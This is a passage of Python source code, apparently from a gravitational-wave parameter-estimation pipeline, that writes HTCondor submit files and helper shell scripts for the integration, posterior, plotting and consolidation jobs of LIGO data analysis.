        print(" LIGO accounting information not available. You must add this manually to %s !" % ile_sub_name)
###
### SUGGESTION FROM STUART (for later)
# request_memory = ifthenelse( (LastHoldReasonCode=!=34 && LastHoldReasonCode=!=26), InitialRequestMemory, int(1.5 * NumJobStarts * MemoryUsage) )
# periodic_release = ((HoldReasonCode =?= 34) || (HoldReasonCode =?= 26))
    # This will automatically release a job that is put on hold for using too much memory, with a 50% increased memory request each time.
return ile_job, ile_sub_name
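# Usage sketch (illustrative; channel names, PSD files, and the cache/grid options
# passed through **kwargs are hypothetical). One node per grid row, selected via
# the $(macroevent) macro:
#
#   ile_job, ile_sub = write_integrate_likelihood_extrinsic_grid_sub(tag='ILE',
#       log_dir='logs/', cache_file='local.cache', sim_xml='overlap-grid.xml.gz',
#       channel_name=['H1=FAKE-STRAIN'], psd_file=['H1=H1-psd.xml.gz'])
#   node = pipeline.CondorDAGNode(ile_job)
#   node.add_macro("macroevent", 0)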
# FIXME: Keep in sync with arguments of integrate_likelihood_extrinsic
def write_integrate_likelihood_extrinsic_sub(tag='integrate', exe=None, log_dir=None, ncopies=1, **kwargs):
"""
Write a submit file for launching jobs to marginalize the likelihood over
extrinsic parameters.
Inputs:
- 'tag' is a string to specify the base name of output files. The output
submit file will be named tag.sub, and the jobs will write their
output to tag-ID.out, tag-ID.err, tag.log, where 'ID' is a unique
identifier for each instance of a job run from the sub file.
- 'cache' is the path to a cache file which gives the location of the
data to be analyzed.
- 'coinc' is the path to a coincident XML file, from which masses and
times will be drawn FIXME: remove this once it's no longer needed.
- 'channelH1/L1/V1' is the channel name to be read for each of the
H1, L1 and V1 detectors.
- 'psdH1/L1/V1' is the path to an XML file specifying the PSD of
each of the H1, L1, V1 detectors.
- 'ncopies' is the number of runs with identical input parameters to
submit per condor 'cluster'
Outputs:
- An instance of the CondorDAGJob that was generated for ILE
"""
assert len(kwargs["psd_file"]) == len(kwargs["channel_name"])
exe = exe or which("integrate_likelihood_extrinsic")
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
#
# Macro based options
#
ile_job.add_var_opt("mass1")
ile_job.add_var_opt("mass2")
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', '2048')
return ile_job, ile_sub_name
def write_result_coalescence_sub(tag='coalesce', exe=None, log_dir=None, output_dir="./", use_default_cache=True):
"""
Write a submit file for launching jobs to coalesce ILE output
"""
exe = exe or which("ligolw_sqlite")
sql_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
sql_sub_name = tag + '.sub'
sql_job.set_sub_file(sql_sub_name)
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
sql_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
sql_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
sql_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
if use_default_cache:
sql_job.add_opt("input-cache", "ILE_$(macromassid).cache")
else:
sql_job.add_arg("$(macrofiles)")
#sql_job.add_arg("*$(macromassid)*.xml.gz")
sql_job.add_opt("database", "ILE_$(macromassid).sqlite")
#if os.environ.has_key("TMPDIR"):
#tmpdir = os.environ["TMPDIR"]
#else:
#print >>sys.stderr, "WARNING, TMPDIR environment variable not set. Will default to /tmp/, but this could be dangerous."
#tmpdir = "/tmp/"
tmpdir = "/dev/shm/"
sql_job.add_opt("tmp-space", tmpdir)
sql_job.add_opt("verbose", None)
sql_job.add_condor_cmd('getenv', 'True')
sql_job.add_condor_cmd('request_memory', '1024')
return sql_job, sql_sub_name
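# Note: the "$(macromassid)"-style tokens above are HTCondor DAG macros, filled in per
# node when the workflow is assembled.  A hedged, illustrative sketch (assumes a
# glue.pipeline CondorDAG object named `dag` already exists; values are examples only):
#   sql_job, sql_sub = write_result_coalescence_sub(tag='coalesce', log_dir='logs/')
#   node = pipeline.CondorDAGNode(sql_job)
#   node.add_macro('macromassid', '0001')   # substitutes $(macromassid) in the .sub file
#   dag.add_node(node)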
def write_posterior_plot_sub(tag='plot_post', exe=None, log_dir=None, output_dir="./"):
"""
    Write a submit file for launching jobs to plot posterior (likelihood contour) summaries from coalesced ILE output
"""
exe = exe or which("plot_like_contours")
plot_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
plot_sub_name = tag + '.sub'
plot_job.set_sub_file(plot_sub_name)
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
plot_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
plot_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
plot_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
plot_job.add_opt("show-points", None)
plot_job.add_opt("dimension1", "mchirp")
plot_job.add_opt("dimension2", "eta")
plot_job.add_opt("input-cache", "ILE_all.cache")
plot_job.add_opt("log-evidence", None)
plot_job.add_condor_cmd('getenv', 'True')
plot_job.add_condor_cmd('request_memory', '1024')
return plot_job, plot_sub_name
def write_tri_plot_sub(tag='plot_tri', injection_file=None, exe=None, log_dir=None, output_dir="./"):
"""
    Write a submit file for launching jobs to make triangle (corner) plots from coalesced ILE output
"""
exe = exe or which("make_triplot")
plot_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
plot_sub_name = tag + '.sub'
plot_job.set_sub_file(plot_sub_name)
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
plot_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
plot_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
plot_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
plot_job.add_opt("output", "ILE_triplot_$(macromassid).png")
if injection_file is not None:
plot_job.add_opt("injection", injection_file)
plot_job.add_arg("ILE_$(macromassid).sqlite")
plot_job.add_condor_cmd('getenv', 'True')
#plot_job.add_condor_cmd('request_memory', '2048')
return plot_job, plot_sub_name
def write_1dpos_plot_sub(tag='1d_post_plot', exe=None, log_dir=None, output_dir="./"):
"""
    Write a submit file for launching jobs to produce 1-d cumulative posterior plots from coalesced ILE output
"""
exe = exe or which("postprocess_1d_cumulative")
plot_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
plot_sub_name = tag + '.sub'
plot_job.set_sub_file(plot_sub_name)
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
plot_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
plot_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
plot_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
plot_job.add_opt("save-sampler-file", "ILE_$(macromassid).sqlite")
plot_job.add_opt("disable-triplot", None)
plot_job.add_opt("disable-1d-density", None)
plot_job.add_condor_cmd('getenv', 'True')
plot_job.add_condor_cmd('request_memory', '2048')
return plot_job, plot_sub_name
def write_CIP_sub(tag='integrate', exe=None, input_net='all.net',output='output-ILE-samples',universe="vanilla",out_dir=None,log_dir=None, use_eos=False,ncopies=1,arg_str=None,request_memory=8192,arg_vals=None, no_grid=False,**kwargs):
"""
Write a submit file for launching jobs to marginalize the likelihood over intrinsic parameters.
Inputs:
Outputs:
        - An instance of the CondorDAGJob that was generated for CIP
"""
exe = exe or which("util_ConstructIntrinsicPosterior_GenericCoordinates.py")
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
#
# Add options en mass, by brute force
#
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
ile_job.add_opt("fname", input_net)
ile_job.add_opt("fname-output-samples", out_dir+"/"+output)
ile_job.add_opt("fname-output-integral", out_dir+"/"+output)
#
# Macro based options.
# - select EOS from list (done via macro)
# - pass spectral parameters
#
# ile_job.add_var_opt("event")
if use_eos:
ile_job.add_var_opt("using-eos")
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
if "fname_output_samples" in kwargs and kwargs["fname_output_samples"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["fname_output_samples"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
if "fname_output_integral" in kwargs and kwargs["fname_output_integral"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["fname_output_integral"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
ile_job.add_condor_cmd("stream_error",'True')
ile_job.add_condor_cmd("stream_output",'True')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
###
### SUGGESTION FROM STUART (for later)
# request_memory = ifthenelse( (LastHoldReasonCode=!=34 && LastHoldReasonCode=!=26), InitialRequestMemory, int(1.5 * NumJobStarts * MemoryUsage) )
# periodic_release = ((HoldReasonCode =?= 34) || (HoldReasonCode =?= 26))
    # This will automatically release a job that is put on hold for using too much memory, with a 50% increased memory request each time.
return ile_job, ile_sub_name
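# Hedged sketch of how write_CIP_sub is typically driven: arg_str is a pre-built
# command-line fragment whose leading dashes are stripped above so the whole string
# can be forwarded through add_opt as one token.  Option names below are illustrative:
#   cip_args = "--parameter mc --parameter delta_mc --n-output-samples 5000"
#   cip_job, cip_sub = write_CIP_sub(tag='CIP', arg_str=cip_args, input_net='all.net',
#                                    out_dir='.', log_dir='logs/')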
def write_puff_sub(tag='puffball', exe=None, input_net='output-ILE-samples',output='puffball',universe="vanilla",out_dir=None,log_dir=None, use_eos=False,ncopies=1,arg_str=None,request_memory=1024,arg_vals=None, no_grid=False,**kwargs):
"""
    Write a submit file for a 'puffball' job (util_ParameterPuffball.py), which perturbs/broadens an input set of intrinsic points.
    Inputs:
    Outputs:
        - An instance of the CondorDAGJob that was generated for the puffball job
"""
exe = exe or which("util_ParameterPuffball.py")
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
#
# Add options en mass, by brute force
#
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
ile_job.add_opt("inj-file", input_net)
ile_job.add_opt("inj-file-out", output)
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_ILE_sub_simple(tag='integrate', exe=None, log_dir=None, use_eos=False,simple_unique=False,ncopies=1,arg_str=None,request_memory=4096,request_gpu=False,request_disk=False,arg_vals=None, transfer_files=None,transfer_output_files=None,use_singularity=False,use_osg=False,use_simple_osg_requirements=False,singularity_image=None,use_cvmfs_frames=False,frames_dir=None,cache_file=None,fragile_hold=False,max_runtime_minutes=None,condor_commands=None,**kwargs):
"""
    Write a submit file for launching ILE jobs to marginalize the likelihood over extrinsic parameters.
Inputs:
Outputs:
- An instance of the CondorDAGJob that was generated for ILE
"""
if use_singularity and (singularity_image == None) :
print(" FAIL : Need to specify singularity_image to use singularity ")
sys.exit(0)
if use_singularity and (frames_dir == None) and (cache_file == None) :
print(" FAIL : Need to specify frames_dir or cache_file to use singularity (at present) ")
sys.exit(0)
if use_singularity and (transfer_files == None) :
print(" FAIL : Need to specify transfer_files to use singularity at present! (we will append the prescript; you should transfer any PSDs as well as the grid file ")
sys.exit(0)
exe = exe or which("integrate_likelihood_extrinsic")
frames_local = None
if use_singularity:
path_split = exe.split("/")
print((" Executable: name breakdown ", path_split, " from ", exe))
singularity_base_exe_path = "/opt/lscsoft/rift/MonteCarloMarginalizeCode/Code/" # should not hardcode this ...!
if 'SINGULARITY_BASE_EXE_DIR' in list(os.environ.keys()) :
singularity_base_exe_path = os.environ['SINGULARITY_BASE_EXE_DIR']
else:
# singularity_base_exe_path = "/opt/lscsoft/rift/MonteCarloMarginalizeCode/Code/" # should not hardcode this ...!
singularity_base_exe_path = "/usr/bin/" # should not hardcode this ...!
exe=singularity_base_exe_path + path_split[-1]
if not(frames_dir is None):
frames_local = frames_dir.split("/")[-1]
elif use_osg: # NOT using singularity!
if not(frames_dir is None):
frames_local = frames_dir.split("/")[-1]
path_split = exe.split("/")
exe=path_split[-1] # pull out basename
exe_here = 'my_wrapper.sh'
if transfer_files is None:
transfer_files = []
transfer_files += ['../my_wrapper.sh']
with open(exe_here,'w') as f:
f.write("#! /bin/bash \n")
f.write(r"""
#!/bin/bash
# Modules and scripts run directly from repository
# Note the repo and branch are self-referential ! Not a robust solution long-term
# Exit on failure:
# set -e
export INSTALL_DIR=research-projects-RIT
export ILE_DIR=${INSTALL_DIR}/MonteCarloMarginalizeCode/Code
export PATH=${PATH}:${ILE_DIR}
export PYTHONPATH=${PYTHONPATH}:${ILE_DIR}
export GW_SURROGATE=gwsurrogate
git clone https://git.ligo.org/richard-oshaughnessy/research-projects-RIT.git
pushd ${INSTALL_DIR}
git checkout temp-RIT-Tides-port_master-GPUIntegration
popd
ls
cat local.cache
echo Starting ...
./research-projects-RIT/MonteCarloMarginalizeCode/Code/""" + exe + " $@ \n")
os.system("chmod a+x "+exe_here)
exe = exe_here # update executable
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
#
# Add options en mass, by brute force
#
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
#
# Macro based options.
# - select EOS from list (done via macro)
# - pass spectral parameters
#
# ile_job.add_var_opt("event")
if use_eos:
ile_job.add_var_opt("using-eos")
requirements =[]
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
if simple_unique:
uniq_str = "$(macroevent)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
# Add lame initial argument
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
if cache_file:
ile_job.add_opt("cache-file",cache_file)
ile_job.add_var_opt("event")
if not use_osg:
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
if not(request_disk is False):
ile_job.add_condor_cmd('request_disk', str(request_disk))
nGPUs =0
if request_gpu:
nGPUs=1
ile_job.add_condor_cmd('request_GPUs', str(nGPUs))
if use_singularity:
# Compare to https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
ile_job.add_condor_cmd('request_CPUs', str(1))
ile_job.add_condor_cmd('transfer_executable', 'False')
ile_job.add_condor_cmd("+SingularityBindCVMFS", 'True')
ile_job.add_condor_cmd("+SingularityImage", '"' + singularity_image + '"')
requirements = []
requirements.append("HAS_SINGULARITY=?=TRUE")
# if not(use_simple_osg_requirements):
# requirements.append("HAS_CVMFS_LIGO_CONTAINERS=?=TRUE")
#ile_job.add_condor_cmd("requirements", ' (IS_GLIDEIN=?=True) && (HAS_LIGO_FRAMES=?=True) && (HAS_SINGULARITY=?=TRUE) && (HAS_CVMFS_LIGO_CONTAINERS=?=TRUE)')
if use_cvmfs_frames:
requirements.append("HAS_LIGO_FRAMES=?=TRUE")
ile_job.add_condor_cmd('use_x509userproxy','True')
if 'X509_USER_PROXY' in list(os.environ.keys()):
print(" Storing copy of X509 user proxy -- beware expiration! ")
cwd = os.getcwd()
fname_proxy = cwd +"/my_proxy" # this can get overwritten, that's fine - just renews, feature not bug
os.system("cp ${X509_USER_PROXY} " + fname_proxy)
# ile_job.add_condor_cmd('x509userproxy',os.environ['X509_USER_PROXY'])
ile_job.add_condor_cmd('x509userproxy',fname_proxy)
if use_osg:
if not(use_simple_osg_requirements):
requirements.append("IS_GLIDEIN=?=TRUE")
# avoid black-holing jobs to specific machines that consistently fail. Uses history attribute for ad
ile_job.add_condor_cmd('periodic_release','(HoldReasonCode == 45) && (HoldReasonSubCode == 0)')
ile_job.add_condor_cmd('job_machine_attrs','Machine')
ile_job.add_condor_cmd('job_machine_attrs_history_length','4')
# for indx in [1,2,3,4]:
# requirements.append("TARGET.GLIDEIN_ResourceName=!=MY.MachineAttrGLIDEIN_ResourceName{}".format(indx))
if "OSG_DESIRED_SITES" in os.environ:
ile_job.add_condor_cmd('+DESIRED_SITES',os.environ["OSG_DESIRED_SITES"])
if "OSG_UNDESIRED_SITES" in os.environ:
ile_job.add_condor_cmd('+UNDESIRED_SITES',os.environ["OSG_UNDESIRED_SITES"])
# Some options to automate restarts, acts on top of RETRY in dag
if fragile_hold:
ile_job.add_condor_cmd("periodic_release","(NumJobStarts < 5) && ((CurrentTime - EnteredCurrentStatus) > 600)")
ile_job.add_condor_cmd("on_exit_hold","(ExitBySignal == True) || (ExitCode != 0)")
if use_singularity or use_osg:
# Set up file transfer options
ile_job.add_condor_cmd("when_to_transfer_output",'ON_EXIT')
# Stream log info
ile_job.add_condor_cmd("stream_error",'True')
ile_job.add_condor_cmd("stream_output",'True')
# Create prescript command to set up local.cache, only if frames are needed
# if we have CVMFS frames, we should be copying local.cache over directly, with it already populated !
if not(frames_local is None) and not(use_cvmfs_frames): # should be required for singularity or osg
try:
lalapps_path2cache=os.environ['LALAPPS_PATH2CACHE']
except KeyError:
print("Variable LALAPPS_PATH2CACHE is unset, assume default lalapps_path2cache is appropriate")
lalapps_path2cache="lalapps_path2cache"
cmdname = 'ile_pre.sh'
if transfer_files is None:
transfer_files = []
transfer_files += ["../ile_pre.sh", frames_dir] # assuming default working directory setup
with open(cmdname,'w') as f:
f.write("#! /bin/bash -xe \n")
f.write( "ls "+frames_local+" | {lalapps_path2cache} 1> local.cache \n".format(lalapps_path2cache=lalapps_path2cache)) # Danger: need user to correctly specify local.cache directory
# Rewrite cache file to use relative paths, not a file:// operation
f.write(" cat local.cache | awk '{print $1, $2, $3, $4}' > local_stripped.cache \n")
f.write("for i in `ls " + frames_local + "`; do echo "+ frames_local + "/$i; done > base_paths.dat \n")
f.write("paste local_stripped.cache base_paths.dat > local_relative.cache \n")
f.write("cp local_relative.cache local.cache \n")
os.system("chmod a+x ile_pre.sh")
ile_job.add_condor_cmd('+PreCmd', '"ile_pre.sh"')
# if use_osg:
# ile_job.add_condor_cmd("+OpenScienceGrid",'True')
if use_cvmfs_frames:
transfer_files += ["../local.cache"]
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
# Write requirements
# From https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
if not transfer_files is None:
if not isinstance(transfer_files, list):
fname_str=transfer_files
else:
fname_str = ','.join(transfer_files)
fname_str=fname_str.strip()
ile_job.add_condor_cmd('transfer_input_files', fname_str)
ile_job.add_condor_cmd('should_transfer_files','YES')
if not transfer_output_files is None:
if not isinstance(transfer_output_files, list):
fname_str=transfer_output_files
else:
fname_str = ','.join(transfer_output_files)
fname_str=fname_str.strip()
ile_job.add_condor_cmd('transfer_output_files', fname_str)
# Periodic remove: kill jobs running longer than max runtime
# https://stackoverflow.com/questions/5900400/maximum-run-time-in-condor
if not(max_runtime_minutes is None):
remove_str = 'JobStatus =?= 2 && (CurrentTime - JobStartDate) > ( {})'.format(60*max_runtime_minutes)
ile_job.add_condor_cmd('periodic_remove', remove_str)
###
### SUGGESTION FROM STUART (for later)
# request_memory = ifthenelse( (LastHoldReasonCode=!=34 && LastHoldReasonCode=!=26), InitialRequestMemory, int(1.5 * NumJobStarts * MemoryUsage) )
# periodic_release = ((HoldReasonCode =?= 34) || (HoldReasonCode =?= 26))
    # This will automatically release a job that is put on hold for using too much memory, with a 50% increased memory request each time.
if condor_commands is not None:
        for cmd, value in condor_commands.items():
ile_job.add_condor_cmd(cmd, value)
return ile_job, ile_sub_name
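# A minimal, hedged usage sketch for write_ILE_sub_simple (assumes a glue.pipeline
# CondorDAG object named `dag`; arguments are illustrative only).  The per-node
# '--event' value is supplied through the $(macroevent) macro declared above:
#   ile_job, ile_sub = write_ILE_sub_simple(tag='ILE', log_dir='logs/',
#                                           arg_str='--fmin 20 --n-max 1000000',
#                                           cache_file='local.cache')
#   for event_id in range(10):
#       node = pipeline.CondorDAGNode(ile_job)
#       node.add_var_opt('event', str(event_id))   # fills $(macroevent)
#       dag.add_node(node)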
def write_consolidate_sub_simple(tag='consolidate', exe=None, base=None,target=None,universe="vanilla",arg_str=None,log_dir=None, use_eos=False,ncopies=1,no_grid=False, **kwargs):
"""
Write a submit file for launching a consolidation job
util_ILEdagPostprocess.sh # suitable for ILE consolidation.
arg_str # add argument (used for NR postprocessing, to identify group)
"""
exe = exe or which("util_ILEdagPostprocess.sh")
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
# Add manual options for input, output
ile_job.add_arg(base) # what directory to load
ile_job.add_arg(target) # where to put the output (label), in CWD
#
# NO OPTIONS
#
# arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
# arg_str = arg_str.lstrip('-')
# ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
###
### SUGGESTION FROM STUART (for later)
# request_memory = ifthenelse( (LastHoldReasonCode=!=34 && LastHoldReasonCode=!=26), InitialRequestMemory, int(1.5 * NumJobStarts * MemoryUsage) )
# periodic_release = ((HoldReasonCode =?= 34) || (HoldReasonCode =?= 26))
    # This will automatically release a job that is put on hold for using too much memory, with a 50% increased memory request each time.
return ile_job, ile_sub_name
def write_unify_sub_simple(tag='unify', exe=None, base=None,target=None,universe="vanilla",arg_str=None,log_dir=None, use_eos=False,ncopies=1,no_grid=False, **kwargs):
"""
    Write a submit file for launching a unification job: concatenate the *.composite files
    with util_CleanILE.py, which removes independent duplicates and strips entries with large errors.
"""
exe = exe or which("util_CleanILE.py") # like cat, but properly accounts for *independent* duplicates. (Danger if identical). Also strips large errors
# Write unify.sh
# - problem of globbing inside condor commands
# - problem that *.composite files from intermediate results will generally NOT be present
cmdname ='unify.sh'
base_str = ''
if not (base is None):
base_str = ' ' + base +"/"
with open(cmdname,'w') as f:
f.write("#! /usr/bin/env bash\n")
f.write( "ls " + base_str+"*.composite 1>&2 \n") # write filenames being concatenated to stderr
